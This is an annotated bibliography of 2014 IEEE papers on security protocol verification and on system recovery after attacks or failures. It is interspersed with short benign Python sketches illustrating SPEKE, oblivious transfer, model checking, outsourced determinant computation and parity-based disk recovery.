    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6839413&isnumber=6839392
  • Kammuller, F., "Verification of DNSsec Delegation Signatures," Telecommunications (ICT), 2014 21st International Conference on, vol., no., pp.298,392, 4-7 May 2014. doi: 10.1109/ICT.2014.6845127 In this paper, we present a formal model for the verification of the DNSsec protocol in the interactive theorem prover Isabelle/HOL. Relying on the inductive approach to security protocol verification, this formal analysis provides a more expressive representation than the widely accepted model checking analysis. Our mechanized model allows us to represent the protocol, all its possible traces, and the attacker and his knowledge. The fine-grained model allows us to show origin authentication and replay attack prevention. Most prominently, we succeed in expressing delegation signatures and proving their authenticity formally.
    Keywords: Internet; cryptographic protocols; formal verification; inference mechanisms; theorem proving; DNSsec delegation signatures; DNSsec protocol; Isabelle-HOL; inductive approach; interactive theorem prover; model checking analysis; security protocol verification; Authentication; IP networks; Protocols; Public key; Servers; DNSsec; Isabelle/HOL; authentication; chain of trust; delegation signatures (ID#:14-2225)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6845127&isnumber=6845063
  • Voskuilen, Gwendolyn; Vijaykumar, T.N., "Fractal++: Closing the Performance Gap Between Fractal And Conventional Coherence," Computer Architecture (ISCA), 2014 ACM/IEEE 41st International Symposium on , vol., no., pp.409,420, 14-18 June 2014. doi: 10.1109/ISCA.2014.6853211 Cache coherence protocol bugs can cause multicores to fail. Existing coherence verification approaches incur state explosion at small scales or require considerable human effort. As protocols' complexity and multicores' core counts increase, verification continues to be a challenge. Recently, researchers proposed fractal coherence which achieves scalable verification by enforcing observational equivalence between sub-systems in the coherence protocol. A larger sub-system is verified implicitly if a smaller sub-system has been verified. Unfortunately, fractal protocols suffer from two fundamental limitations: (1) indirect-communication: sub-systems cannot directly communicate and (2) partially-serial-invalidations: cores must be invalidated in a specific, serial order. These limitations disallow common performance optimizations used by conventional directory protocols: reply-forwarding where caches communicate directly and parallel invalidations. Therefore, fractal protocols lack performance scalability while directory protocols lack verification scalability. To enable both performance and verification scalability, we propose Fractal++ which employs a new class of protocol optimizations for verification-constrained architectures: decoupled-replies, contention-hints, and fully-parallel-fractal-invalidations. The first two optimizations allow reply-forwarding-like performance while the third optimization enables parallel invalidations in fractal protocols. Unlike conventional protocols, Fractal++ preserves observational equivalence and hence is scalably verifiable. In 32-core simulations of single- and four-socket systems, Fractal++ performs nearly as well as a directory protocol while providing scalable verifiability whereas the best-performing previous fractal protocol performs 8% on average and up to 26% worse with a single-socket and 12% on average and up to 34% worse with a longer-latency multi-socket system.
    Keywords: Coherence; Erbium; Fractals; Multicore processing; Optimization; Protocols; Scalability (ID#:14-2226)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6853211&isnumber=6853187
  • Wang, H., "Identity-Based Distributed Provable Data Possession in Multi-Cloud Storage," Services Computing, IEEE Transactions on, vol. PP, no.99, pp.1,1, March 2014. doi: 10.1109/TSC.2014.1 Remote data integrity checking is of crucial importance in cloud storage. It enables clients to verify whether their outsourced data is kept intact without downloading the whole data. In some application scenarios, clients have to store their data on multi-cloud servers. At the same time, the integrity checking protocol must be efficient in order to save the verifier's cost. Motivated by these two points, we propose a novel remote data integrity checking model: ID-DPDP (identity-based distributed provable data possession) in multi-cloud storage. The formal system model and security model are given. Based on bilinear pairings, a concrete ID-DPDP protocol is designed. The proposed ID-DPDP protocol is provably secure under the hardness assumption of the standard CDH (computational Diffie-Hellman) problem. In addition to the structural advantage of eliminating certificate management, our ID-DPDP protocol is also efficient and flexible. Based on the client's authorization, the proposed ID-DPDP protocol can realize private verification, delegated verification, and public verification.
    Keywords: Cloud computing; Computational modeling; Distributed databases; Indexes; Protocols; Security; Servers (ID#:14-2227)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6762896&isnumber=4629387
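    For readers unfamiliar with the hardness assumption invoked above, the standard computational Diffie-Hellman (CDH) problem underlying such pairing-based schemes can be stated as follows (the textbook formulation, not notation drawn from the paper itself). Let G be a cyclic group of prime order q with generator g:

      \[
        \text{Given } \bigl(g,\; g^{a},\; g^{b}\bigr) \text{ with } a, b \xleftarrow{\$} \mathbb{Z}_q \text{ uniform,} \quad \text{compute } g^{ab}.
      \]

    The CDH assumption says that no probabilistic polynomial-time algorithm solves this with non-negligible probability; security proofs like the one cited typically reduce forging a valid proof of possession to solving this problem.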
  • Alrabaee, S.; Bataineh, A; Khasawneh, F.A; Dssouli, R., "Using Model Checking For Trivial File Transfer Protocol Validation," Communications and Networking (ComNet), 2014 International Conference on, vol., no., pp.1,7, 19-22 March 2014. doi: 10.1109/ComNet.2014.6840934 This paper presents verification and model-based checking of the Trivial File Transfer Protocol (TFTP). Model checking is a technique for software verification that can detect concurrency defects within appropriate constraints by performing an exhaustive state-space search on a software design or implementation, alerting the implementing organization to potential design deficiencies that are otherwise difficult to discover. TFTP is implemented on top of the Internet User Datagram Protocol (UDP) or any other datagram protocol. We create a design model of the TFTP protocol, extended with a window size, simulate it, and validate specified properties using SPIN. The verification has been done using the model checking tool SPIN, which accepts design specifications written in the verification language PROMELA. The results show that TFTP is free of livelocks.
    Keywords: formal verification; transport protocols; Internet user datagram protocol; Promela; SPIN; TFTP protocol; UDP; concurrency defect detection; exhaustive state space search; model based checking tool; software verification; trivial file transfer protocol; Authentication; Protocols; Software engineering; Modeling; Protocol Design; TFTP; Validation (ID#:14-2228)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6840934&isnumber=6840902
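    The abstract does not reproduce the Promela model itself. Purely as an illustration of what an exhaustive state-space search does, the toy Python sketch below explores every reachable state of a drastically simplified stop-and-wait transfer over a lossy channel (our own simplification, not the authors' TFTP model) and checks that no non-final state gets stuck:

      from collections import deque

      # Toy exhaustive state-space search in the spirit of SPIN, run over a
      # simplified stop-and-wait transfer of 3 blocks across a lossy channel.
      # A state is (sender_block, receiver_block, in_flight_packet).
      def successors(state):
          s, r, chan = state
          succ = []
          if chan is None:
              if s < 3:                               # sender (re)transmits block s
                  succ.append((s, r, ('DATA', s)))
          else:
              kind, seq = chan
              succ.append((s, r, None))               # nondeterministic packet loss
              if kind == 'DATA':
                  if seq == r:                        # in-order data: accept and ACK
                      succ.append((s, r + 1, ('ACK', seq)))
                  else:                               # duplicate data: re-ACK
                      succ.append((s, r, ('ACK', r - 1)))
              elif seq == s:                          # expected ACK: sender advances
                  succ.append((s + 1, r, None))
              else:                                   # stale ACK: ignore
                  succ.append((s, r, None))
          return succ

      seen, frontier = set(), deque([(0, 0, None)])
      while frontier:
          st = frontier.popleft()
          if st in seen:
              continue
          seen.add(st)
          nxt = successors(st)
          # Deadlock check: only the final state (all 3 blocks sent) may be stuck.
          assert nxt or st[0] == 3, f"deadlock in state {st}"
          frontier.extend(nxt)
      print(f"explored {len(seen)} states, no deadlock found")

    SPIN performs essentially this search, but over the full Promela semantics and with far more sophisticated state compression and property checking.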
  • Alezabi, Kamal Ali; Hashim, Fazirulhisyam; Hashim, Shaiful Jahari; Ali, Borhanuddin M., "An efficient authentication and key agreement protocol for 4G (LTE) networks," Region 10 Symposium, 2014 IEEE, vol., no., pp.502,507, 14-16 April 2014. doi: 10.1109/TENCONSpring.2014.6863085 Long Term Evolution (LTE) networks designed by the 3rd Generation Partnership Project (3GPP) represent a widespread technology, characterized by high data rates, minimal delay, and capacity due to scalable bandwidth and flexibility. With the rapid spread of LTE networks and the increasing use of data/video transmission and Internet applications in general, the challenges of securing and speeding up data communication in such networks have also increased. Authentication in LTE networks is a very important process because most attacks occur during this stage: attackers try to get authenticated, then exploit network resources and deny legitimate users network services. LTE's AKA protocol, called Evolved Packet System AKA (EPS-AKA), is based on the Extensible Authentication Protocol-Authentication and Key Agreement (EAP-AKA); however, it still suffers from various vulnerabilities such as disclosure of the user identity, computational overhead, Man-In-The-Middle (MITM) attacks, and authentication delay. In this paper, an Efficient EPS-AKA protocol (EEPS-AKA) is proposed to overcome those problems. The proposed protocol is based on the Simple Password Exponential Key Exchange (SPEKE) protocol. Compared to previously proposed methods, our method is faster, since it uses a secret-key method that is faster than certificate-based methods. In addition, the size of messages exchanged between the User Equipment (UE) and the Home Subscriber Server (HSS) is reduced, which effectively reduces authentication delay and storage overhead. The automated validation of internet security protocols and applications (AVISPA) tool is used to provide formal verification. Results show that the proposed EEPS-AKA is efficient and secure against active and passive attacks.
    Keywords: EEPS-AKA; LTE EPS-AKA; SPEKE (ID#:14-2229)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6863085&isnumber=6862973
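    Since SPEKE is the building block of the proposed EEPS-AKA, a toy run of plain SPEKE may help readers unfamiliar with it. The Python sketch below uses a deliberately tiny safe prime and omits key confirmation, identity binding, and everything LTE-specific, so it illustrates only the password-derived-generator idea, not the authors' protocol:

      import hashlib, secrets

      # Toy SPEKE (Simple Password Exponential Key Exchange): both sides derive
      # a Diffie-Hellman generator from the shared password, then run ordinary
      # DH. p = 23 is a safe prime (p = 2q + 1, q = 11); real deployments use
      # a large (2048-bit or more) safe prime.
      p = 23
      q = (p - 1) // 2

      def speke_generator(password: str) -> int:
          # Hash the password and square it mod p, landing in the order-q
          # subgroup of quadratic residues. The retry counter is a safeguard
          # needed only because our toy p makes degenerate outputs likely.
          counter = 0
          while True:
              h = int.from_bytes(hashlib.sha256(f"{password}:{counter}".encode()).digest(), "big")
              g = pow(h % p, 2, p)
              if g not in (0, 1):
                  return g
              counter += 1

      g = speke_generator("shared-secret")
      a = secrets.randbelow(q - 1) + 1        # UE's ephemeral exponent
      b = secrets.randbelow(q - 1) + 1        # HSS's ephemeral exponent
      A, B = pow(g, a, p), pow(g, b, p)       # values exchanged on the air

      k_ue, k_hss = pow(B, a, p), pow(A, b, p)
      assert k_ue == k_hss                    # both sides now hold g^(ab) mod p
      print("session key:", hashlib.sha256(str(k_ue).encode()).hexdigest()[:16])

    An attacker who guesses the wrong password derives the wrong generator and therefore the wrong key, which is what gives SPEKE its password-authenticated character.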
  • Zhuo Hao; Yunlong Mao; Sheng Zhong; Li, L.E.; Haifan Yao; Nenghai Yu, "Toward Wireless Security without Computational Assumptions--Oblivious Transfer Based on Wireless Channel Characteristics," Computers, IEEE Transactions on, vol.63, no.6, pp.1580,1593, June 2014. doi: 10.1109/TC.2013.27 Wireless security has been an active research area for the last decade. Many studies of wireless security use cryptographic tools, but traditional cryptographic tools are normally based on computational assumptions, which may turn out to be invalid in the future. Consequently, it is very desirable to build cryptographic tools that do not rely on computational assumptions. In this paper, we focus on a crucial cryptographic tool, namely 1-out-of-2 oblivious transfer. This tool plays a central role in cryptography because we can build a cryptographic protocol for any polynomial-time computable function using it. We present a novel 1-out-of-2 oblivious transfer protocol based on wireless channel characteristics, which does not rely on any computational assumption. We also illustrate the potential broad applications of this protocol by giving two applications, one on private communications and the other on privacy-preserving password verification. We have fully implemented this protocol on wireless devices and conducted experiments in real environments to evaluate the protocol. Our experimental results demonstrate that it has reasonable efficiency.
    Keywords: computational complexity; cryptographic protocols; data privacy; transport protocols; wireless channels; 1-out-of-2 oblivious transfer protocol; computational assumptions; cryptographic protocol; cryptographic tools; polynomial-time computable function; privacy preserving password verification; private communications; wireless channel characteristics; wireless devices; wireless security; Channel estimation; Communication system security; Cryptography; Probes; Protocols; Wireless communication; Oblivious transfer; physical channel characteristics; security (ID#:14-2230)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6463377&isnumber=6828816
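    The abstract does not spell out the protocol. For intuition, the sketch below implements the classic construction of 1-out-of-2 oblivious transfer from an erasure channel (a Crepeau-style construction for semi-honest parties), with a simulated 50% erasure channel standing in for the correlated randomness the authors extract from wireless channel characteristics; it is not the paper's protocol:

      import secrets

      # 1-out-of-2 OT from erasures, semi-honest setting. The sender transmits
      # N random bits over a channel that erases each bit with probability 1/2;
      # only the receiver learns which bits survived.
      N, K = 64, 16
      r = [secrets.randbits(1) for _ in range(N)]              # sender's bits
      erased = [secrets.randbits(1) == 1 for _ in range(N)]
      good = [i for i in range(N) if not erased[i]]            # receiver knows r[i]
      bad  = [i for i in range(N) if erased[i]]                # receiver does not
      assert len(good) >= K and len(bad) >= K                  # holds w.h.p.

      b = 1                         # receiver's secret choice bit
      sets = [None, None]
      sets[b], sets[1 - b] = good[:K], bad[:K]
      # Receiver sends (sets[0], sets[1]) to the sender; both look like
      # arbitrary index lists, so the choice bit b stays hidden.

      m = [0, 1]                    # sender's two one-bit messages
      def mask(idx):                # XOR of the sender's bits at these indices
          v = 0
          for i in idx:
              v ^= r[i]
          return v
      c = [m[0] ^ mask(sets[0]), m[1] ^ mask(sets[1])]         # sent to receiver

      # The receiver knows r[i] only on sets[b], so it can strip exactly one
      # mask (we reuse the global r for brevity; a real receiver holds only
      # its received copies).
      assert c[b] ^ mask(sets[b]) == m[b]
      print("receiver recovered m[%d] = %d" % (b, c[b] ^ mask(sets[b])))

    The sender never learns b, and the receiver learns nothing about the other message because its mask includes bits the receiver never saw.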
  • Ceccarelli, A; Montecchi, L.; Brancati, F.; Lollini, P.; Marguglio, A; Bondavalli, A, "Continuous and Transparent User Identity Verification for Secure Internet Services," Dependable and Secure Computing, IEEE Transactions on, vol. PP, no.99, pp.1,1, January 2014. doi: 10.1109/TDSC.2013.2297709 Session management in distributed Internet services is traditionally based on username and password, explicit logouts, and mechanisms of user session expiration using classic timeouts. Emerging biometric solutions allow substituting biometric data for username and password during session establishment, but in such an approach a single verification is still deemed sufficient, and the identity of a user is considered immutable during the entire session. Additionally, the length of the session timeout may impact the usability of the service and consequent client satisfaction. This paper explores promising alternatives offered by applying biometrics to the management of sessions. A secure protocol is defined for perpetual authentication through continuous user verification. The protocol determines adaptive timeouts based on the quality, frequency, and type of biometric data transparently acquired from the user. The functional behavior of the protocol is illustrated through Matlab simulations, while model-based quantitative analysis is carried out to assess the ability of the protocol to contrast security attacks exercised by different kinds of attackers. Finally, the current prototype for PCs and Android smartphones is discussed.
    Keywords: Authentication; Bioinformatics; Protocols; Servers; Smart phones; Web services; Security; authentication; mobile environments; web servers (ID#:14-2231)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6702439&isnumber=4358699
  • Lei, X.; Liao, X.; Huang, T.; Li, H., "Cloud Computing Service: the Case of Large Matrix Determinant Computation," Services Computing, IEEE Transactions on, vol.PP, no.99, pp.1,1, June 2014. doi: 10.1109/TSC.2014.2331694 The cloud computing paradigm provides an alternative and economical service for resource-constrained clients to perform large-scale data computation. Since large matrix determinant computation (DC) is ubiquitous in the fields of science and engineering, a first step is taken in this paper to design a protocol that enables clients to securely, verifiably, and efficiently outsource DC to a malicious cloud. The main idea for protecting privacy is to apply transformations to the original matrix to obtain an encrypted matrix which is sent to the cloud, and then to transform the result returned from the cloud to get the correct determinant of the original matrix. Afterwards, a randomized Monte Carlo verification algorithm with one-sided error is introduced, whose superiority in designing inexpensive result-verification algorithms for secure outsourcing is well demonstrated. In addition, it is analytically shown that the proposed protocol simultaneously fulfills the goals of correctness, security, robust cheating resistance, and high efficiency. Extensive theoretical analysis and experimental evaluation also show its high efficiency and immediate practicability. It is hoped that the proposed protocol can shed light on the design of other novel secure outsourcing protocols and inspire companies and working groups to build the all-inclusive scientific-computation outsourcing software systems that are in demand. Such software systems could be profitable by providing large-scale scientific computation services to many potential clients. (ID#:14-2232)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6839008&isnumber=4629387
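    To make the mask-compute-unmask idea concrete, here is a toy numpy sketch. It uses plain diagonal scaling as the transformation, which is simpler and weaker than the transformations the paper proposes, and it omits the paper's Monte Carlo result verification entirely:

      import numpy as np

      # Toy sketch of outsourced determinant computation: mask the matrix,
      # let the "cloud" compute the determinant of the masked matrix, then
      # unmask the result locally.
      rng = np.random.default_rng(7)
      n = 6
      A = rng.standard_normal((n, n))          # client's private matrix

      d1 = rng.uniform(0.5, 2.0, n)            # secret diagonal masks
      d2 = rng.uniform(0.5, 2.0, n)
      B = (d1[:, None] * A) * d2[None, :]      # B = D1 @ A @ D2, sent to cloud

      det_B = np.linalg.det(B)                 # computed by the cloud
      det_A = det_B / (d1.prod() * d2.prod())  # client unmasks locally

      assert np.isclose(det_A, np.linalg.det(A))
      print("recovered det(A) =", det_A)

    The unmasking works because det(D1 A D2) = det(D1) det(A) det(D2), and the determinant of a diagonal matrix is just the product of its entries.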
  • Castro Marquez, C.I; Strum, M.; Wang Jiang Chau, "A Unified Sequential Equivalence Checking Approach To Verify High-Level Functionality And Protocol Specification Implementations In RTL Designs," Test Workshop - LATW, 2014 15th Latin American, vol., no., pp.1,6, 12-15 March 2014. doi: 10.1109/LATW.2014.6841905 Formal techniques provide exhaustive design verification, but computational margins have an important negative impact on their efficiency. Sequential equivalence checking is an effective approach, but traditionally it has been applied only between circuit descriptions with one-to-one correspondence for states. Applying it between RTL descriptions and high-level reference models requires removing the signals, variables, and states exclusive to the RTL description so as to comply with the state correspondence restriction. In this paper, we extend a previous formal methodology for RTL verification with high-level models to also check the signals and protocol implemented in the RTL design. This protocol implementation is compared formally to a description captured from the specification. Thus, we can thoroughly prove the sequential behavior of a design under verification.
    Keywords: electronic design automation; formal specification; formal verification; high level synthesis; protocols; RTL design verification; computational margin; design under verification; design verification; formal technique; high level functionality verification; high level model; high level reference model; protocol specification implementation; unified sequential equivalence checking approach; Abstracts; Calculators; Computational modeling; Data models; Educational institutions; Integrated circuit modeling; Protocols; RTL design; Sequential equivalence checking; communication protocol; formal verification; high-level models; sequence of states (ID#:14-2233)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6841905&isnumber=6841893
  • Wang, Junwei; Wang, Haifeng, "Trust-based QoS routing algorithm for Wireless Sensor Networks," Control and Decision Conference (2014 CCDC), The 26th Chinese, vol., no., pp.2492,2495, May 31 2014-June 2 2014. doi: 10.1109/CCDC.2014.6852592 With the rapid development of Wireless Sensor Networks (WSNs), not only energy efficiency but also Quality of Service (QoS) support and the validity of packet transmission must be considered under some circumstances. In this paper, after summarizing the LEACH protocol's advantages and defects and combining trust evaluation mechanisms with energy and QoS control, a trust-based QoS routing algorithm is put forward. First, energy control and coverage scale are adopted to keep the load balanced in the cluster-head selection phase. Second, a trust evaluation mechanism is designed to increase the credibility of the network in the node-clustering stage. Finally, in the information transmission period, verification and ACK mechanisms are employed to guarantee the validity of data transmission. The improved protocol can not only prolong nodes' life expectancy, but also increase the credibility of information transmission and reduce packet loss. Compared to typical routing algorithms in sensor networks, this new algorithm has better performance.
    Keywords: Algorithm design and analysis; Data communication; Delays; Energy efficiency; Quality of service; Routing; Wireless sensor networks; Energy Efficient; LEACH; QoS; Trust Routing; Wireless Sensor Networks (ID#:14-2234)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6852592&isnumber=6852105
  • Madhusudhan, R.; Kumar, S.R., "Cryptanalysis of a Remote User Authentication Protocol Using Smart Cards," Service Oriented System Engineering (SOSE), 2014 IEEE 8th International Symposium on, vol., no., pp.474,477, 7-11 April 2014. doi: 10.1109/SOSE.2014.84 Remote user authentication using smart cards is a method of verifying the legitimacy of remote users accessing a server through an insecure channel, using smart cards to increase the efficiency of the system. In the last couple of years, many protocols to authenticate remote users using smart cards have been proposed, but unfortunately most of them have been proved insecure against various attacks. Recently, Yung-Cheng Lee improved Shin et al.'s protocol and claimed that the improved protocol is more secure. In this article, we show that Yung-Cheng Lee's protocol also has defects: it does not provide user anonymity, and it is vulnerable to denial-of-service attacks, session key reveal, user impersonation attacks, server impersonation attacks, and insider attacks. Further, its password change phase is inefficient, since it requires communication with the server and uses a verification table.
    Keywords: computer network security; cryptographic protocols; message authentication; smart cards; Yung-Cheng-Lee's protocol; cryptanalysis; denial-of-service attack; insecure channel; insider attacks; legitimacy verification; password change phase; remote user authentication protocol; server impersonation attack; session key; smart cards; user impersonation attack; verification table; Authentication; Bismuth; Cryptography; Protocols; Servers; Smart cards; authentication; smart card; cryptanalysis; dynamic id (ID#:14-2235)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6830951&isnumber=6825948
  • Daesung Choi; Sungdae Hong; Hyoung-Kee Choi, "A Group-Based Security Protocol For Machine Type Communications In LTE-Advanced," Computer Communications Workshops (INFOCOM WKSHPS), 2014 IEEE Conference on, vol., no., pp.161,162, April 27 2014-May 2 2014. doi: 10.1109/INFCOMW.2014.6849205 We propose Authentication and Key Agreement (AKA) for Machine Type Communications (MTC) in LTE-Advanced. This protocol is based on the idea of grouping devices so as to reduce signaling congestion in the access network and overload on the single authentication server. We verified that this protocol is secure against many attacks by using a software verification tool. Furthermore, performance evaluation suggests that this protocol is efficient with respect to authentication overhead and handover delay.
    Keywords: Long Term Evolution; cryptographic protocols; mobility management (mobile radio); radio access networks; signaling protocols; telecommunication security; AKA; LTE-advanced communication; MTC; access network; authentication and key agreement; group-based security protocol; handover delay; machine type communication; performance evaluation; signaling congestion reduction; single authentication server overhead; software verification tool; Authentication; Computer science; Delays; Handover; Protocols (ID#:14-2236)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6849205&isnumber=6849127
  • Liu, W.; Yu, M., "AASR: An Authenticated Anonymous Secure Routing Protocol for MANETs in Adversarial Environment," Vehicular Technology, IEEE Transactions on, vol.PP, no.99, pp.1,1, March 2014. doi: 10.1109/TVT.2014.2313180 Anonymous communications are important for many applications of mobile ad hoc networks (MANETs) deployed in adversarial environments. A major requirement on such a network is to provide unidentifiability and unlinkability for mobile nodes and their traffic. Although a number of anonymous secure routing protocols have been proposed, this requirement is not fully satisfied. The existing protocols are vulnerable to attacks using fake routing packets or denial-of-service (DoS) broadcasting, even when node identities are protected by pseudonyms. In this paper, we propose a new routing protocol, authenticated anonymous secure routing (AASR), to satisfy the requirement and defend against these attacks. More specifically, route request packets are authenticated by a group signature, to defend against potential active attacks without unveiling node identities. Key-encrypted onion routing with a route secret verification message is designed to prevent intermediate nodes from inferring the real destination. Simulation results demonstrate the effectiveness of the proposed AASR protocol, with improved performance compared to the existing protocols.
    Keywords: (not provided) (ID#:14-2237)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6777291&isnumber=4356907
  • Huaqun Wang; Qianhong Wu; Bo Qin; Domingo-Ferrer, J., "Identity-based Remote Data Possession Checking In Public Clouds," Information Security, IET, vol.8, no.2, pp.114,121, March 2014. doi: 10.1049/iet-ifs.2012.0271 Checking remote data possession is of crucial importance in public cloud storage. It enables users to check whether their outsourced data have been kept intact without downloading the original data. The existing remote data possession checking (RDPC) protocols have been designed in the PKI (public key infrastructure) setting, where the cloud server has to validate users' certificates before storing the data uploaded by the users in order to prevent spam. This incurs considerable costs, since numerous users may frequently upload data to the cloud server. This study addresses the problem with a new model of identity-based RDPC (ID-RDPC) protocols. The authors present the first ID-RDPC protocol proven secure assuming the hardness of the standard computational Diffie-Hellman problem. In addition to the structural advantage of eliminating certificate management and verification, the authors' ID-RDPC protocol also outperforms the existing RDPC protocols in the PKI setting in terms of computation and communication.
    Keywords: cloud computing; cryptographic protocols; public key cryptography; storage management; unsolicited e-mail; ID-RDPC protocol; PKI setting; certificate management elimination; cloud server; data outsourcing; identity-based RDPC protocols; identity-based remote data possession checking protocol; public cloud storage; public key infrastructure; spam; standard computational Diffie-Hellman problem (ID#:14-2238)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6748545&isnumber=6748540

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


System Recovery

System Recovery



System recovery following an attack is a core cybersecurity issue. Current research into methods to undo data manipulation and to recover lost or extruded data in distributed, cloud-based, or other large-scale complex systems is discovering new approaches. The articles cited here are from the first half of 2014.

  • Silei Xu; Runhui Li; Lee, P.P.C.; Yunfeng Zhu; Liping Xiang; Yinlong Xu; Lui, J.C.S., "Single Disk Failure Recovery for X-Code-Based Parallel Storage Systems," Computers, IEEE Transactions on , vol.63, no.4, pp.995,1007, April 2014. In modern parallel storage systems (e.g., cloud storage and data centers), it is important to provide data availability guarantees against disk (or storage node) failures via redundancy coding schemes. One coding scheme is X-code, which is double-fault tolerant while achieving the optimal update complexity. When a disk/node fails, recovery must be carried out to reduce the possibility of data unavailability. We propose an X-code-based optimal recovery scheme called minimum-disk-read-recovery (MDRR), which minimizes the number of disk reads for single-disk failure recovery. We make several contributions. First, we show that MDRR provides optimal single-disk failure recovery and reduces about 25 percent of disk reads compared to the conventional recovery approach. Second, we prove that any optimal recovery scheme for X-code cannot balance disk reads among different disks within a single stripe in general cases. Third, we propose an efficient logical encoding scheme that issues balanced disk read in a group of stripes for any recovery algorithm (including the MDRR scheme). Finally, we implement our proposed recovery schemes and conduct extensive testbed experiments in a networked storage system prototype. Experiments indicate that MDRR reduces around 20 percent of recovery time of the conventional approach, showing that our theoretical findings are applicable in practice.
    Keywords: disc storage; encoding; parallel memories; redundancy; reliability; storage management; system recovery; MDRR; X-code-based optimal recovery scheme; X-code-based parallel storage systems; cloud storage; data availability; data centers; double-fault tolerant coding scheme; logical encoding scheme; minimum-disk-read-recovery; networked storage system prototype; optimal single-disk failure recovery; optimal update complexity; redundancy coding schemes; single disk failure recovery algorithm; Arrays; Complexity theory; Data communication; Encoding; Load management; Peer to peer computing; Reliability; Parallel storage systems; coding theory; data availability; recovery algorithm (ID#:14-2239)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6409832&isnumber=6774900
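    X-code's diagonal parity layout and MDRR's read-minimization analysis are beyond a short example, but the XOR identity that every such recovery scheme exploits is easy to show. The Python sketch below recovers one failed disk in a toy single-parity array; the number of blocks read in that loop is exactly the quantity MDRR minimizes (in X-code, by choosing between the two parity directions so that reads overlap):

      import secrets

      # The XOR identity behind single-disk recovery in parity-based arrays:
      # if parity = d0 ^ d1 ^ ... ^ d(k-1), any one lost disk equals the XOR
      # of all surviving disks plus the parity.
      k = 4
      disks = [secrets.token_bytes(8) for _ in range(k)]
      parity = bytes(b0 ^ b1 ^ b2 ^ b3 for b0, b1, b2, b3 in zip(*disks))

      failed = 2                                # disk 2 fails
      survivors = [d for i, d in enumerate(disks) if i != failed] + [parity]
      recovered = survivors[0]
      for blk in survivors[1:]:                 # each iteration is one disk read
          recovered = bytes(a ^ b for a, b in zip(recovered, blk))

      assert recovered == disks[failed]
      print("disk", failed, "recovered from", len(survivors), "reads")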
  • Malik, O.A; Senanayake, S.M.N.; Zaheer, D., "An Intelligent Recovery Progress Evaluation System for ACL Reconstructed Subjects Using Integrated 3-D Kinematics and EMG Features," Biomedical and Health Informatics, IEEE Journal of , vol.PP, no.99, pp.1,1,April 2014. An intelligent recovery evaluation system is presented for objective assessment and performance monitoring of anterior cruciate ligament reconstructed (ACL-R) subjects. The system acquires 3-D kinematics of tibiofemoral joint and electromyography (EMG) data from surrounding muscles during various ambulatory and balance testing activities through wireless body-mounted inertial and EMG sensors, respectively. An integrated feature set is generated based on different features extracted from data collected for each activity. The fuzzy clustering and adaptive neuro-fuzzy inference techniques are applied to these integrated feature sets in order to provide different recovery progress assessment indicators (e.g. current stage of recovery, percentage of recovery progress as compared to healthy group etc.) for ACL-R subjects. The system was trained and tested on data collected from a group of healthy and ACL-R subjects. For recovery stage identification, the average testing accuracy of the system was found above 95% (95-99%) for ambulatory activities and above 80% (80-84%) for balance testing activities. The overall recovery evaluation performed by the proposed system was found consistent with the assessment made by the physiotherapists using standard subjective/objective scores. The validated system can potentially be used as a decision supporting tool by physiatrists, physiotherapists and clinicians for quantitative rehabilitation analysis of ACL-R subjects in conjunction with the existing recovery monitoring systems.
    Keywords: (not provided) (ID#:14-2240)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6805568&isnumber=6363502
  • Kaczmarek, J.; Wrobel, M.R., "Operating system security by integrity checking and recovery using write-protected storage," Information Security, IET, vol.8, no.2, pp.122,131, March 2014. An integrity checking and recovery (ICAR) system is presented here, which protects file system integrity and automatically restores modified files. The system enables the generation and verification of cryptographic hashes of files, as well as the configuration of security constraints. All of the crucial data, including ICAR system binaries, file backups, and the hash database, are stored in physically write-protected storage to eliminate the threat of unauthorized modification. A buffering mechanism was designed and implemented in the system to increase operation performance. Additionally, the system supplies user tools for cryptographic hash generation and security database management. The system is implemented as a kernel extension, compliant with the Linux security model. Experimental evaluation of the system showed an approximately 10% performance degradation in secured file access compared to regular access.
    Keywords: Linux; database management systems; security of data; ICAR system binaries; Linux security model; buffering mechanism; cryptographic hashes generation; file backups; file system integrity; hashes database; integrity checking and recovery system; security constraints; security database management; system security; unauthorized modification; write-protected storage (ID#:14-2241)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6748546&isnumber=6748540
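    A minimal sketch of the check-then-restore loop described above, in Python; the store layout and paths are illustrative assumptions, not the paper's implementation (which runs as a Linux kernel extension rather than user-space code):

      import hashlib, shutil
      from pathlib import Path

      # ICAR-style idea: keep cryptographic hashes (and backups) of protected
      # files on write-protected storage; on a hash mismatch, restore the file
      # from its backup. PROTECTED_STORE is a hypothetical mount point.
      PROTECTED_STORE = Path("/mnt/write-protected")

      def file_hash(path: Path) -> str:
          return hashlib.sha256(path.read_bytes()).hexdigest()

      def check_and_recover(target: Path) -> bool:
          """Return True if the file was intact, False if it was restored."""
          expected = (PROTECTED_STORE / "hashes" / target.name).read_text().strip()
          if file_hash(target) == expected:
              return True
          backup = PROTECTED_STORE / "backups" / target.name
          shutil.copy2(backup, target)             # automatic restore
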